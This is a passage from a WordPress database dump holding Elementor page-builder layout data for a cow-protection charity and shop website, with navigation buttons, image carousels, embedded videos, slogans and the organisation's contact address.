here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10182,1704,'_elementor_page_assets','a:0:{}'),(10184,1705,'_elementor_edit_mode','builder'),(10185,1705,'_elementor_template_type','wp-page'),(10186,1705,'_elementor_version','3.7.8'),(10187,1705,'_wp_page_template','elementor_canvas'),(10188,1705,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"_margin\":{\"unit\":\"px\",\"top\":\"-11\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10189,1705,'_elementor_page_assets','a:0:{}'),(10192,1706,'_elementor_edit_mode','builder'),(10193,1706,'_elementor_template_type','wp-page'),(10194,1706,'_elementor_version','3.7.8'),(10195,1706,'_wp_page_template','elementor_canvas'),(10196,1706,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"